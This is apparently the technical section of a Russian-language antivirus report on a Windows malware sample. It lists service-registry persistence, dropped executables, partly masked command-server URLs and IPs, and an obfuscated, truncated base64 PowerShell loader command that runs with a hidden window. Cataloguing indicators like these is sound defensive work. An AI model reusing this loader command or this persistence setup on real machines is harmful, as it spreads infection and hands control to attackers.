Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\oleacchooks] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\oleacchooks] 'ImagePath' = '"%WINDIR%\SysWOW64\msi\oleacchooks.exe"'
- 'oleacchooks' "%WINDIR%\SysWOW64\msi\oleacchooks.exe"
- 'oleacchooks' %WINDIR%\SysWOW64\msi\oleacchooks.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGADEAaABqADcAXwByAD0AKAAoACcARQAnACsAJwA5AGIAJwApACsAKAAnADcAdAAnACsAJwB4ACcAKQArACcAcwAnACkAOwAmACgAJwBuACcAKwAnAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABFAE4AdgA6AFQARQBNAHAAXABXAG8AcgBEAF...
- %TEMP%\word\2019\p7hhgr.exe
- %WINDIR%\syswow64\msi\oleacchooks.exe
- %TEMP%\word\2019\p7hhgr.exe в %WINDIR%\syswow64\msi\oleacchooks.exe
- '17#.#1.218.65':80
- http://te###sign.com/stats/0W/
- http://17#.#1.218.65/koPbMAFI163S5yUsj1v/ESP5TLAVUwIvF6sf1Vb/8cYkUxZ8aL9vukZogf/2q89QF9Zpo/gpnnkh65nCd2gc/8Vf7b54WE/
- DNS ASK te###sign.com
- '%TEMP%\word\2019\p7hhgr.exe'
- '%WINDIR%\syswow64\msi\oleacchooks.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGADEAaABqADcAXwByAD0AKAAoACcARQAnACsAJwA5AGIAJwApACsAKAAnADcAdAAnACsAJwB4ACcAKQArACcAcwAnACkAOwAmACgAJwBuACcAKwAnAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABFAE4AdgA6AFQARQBNAHAAXABXAG8AcgBEAF...' (со скрытым окном)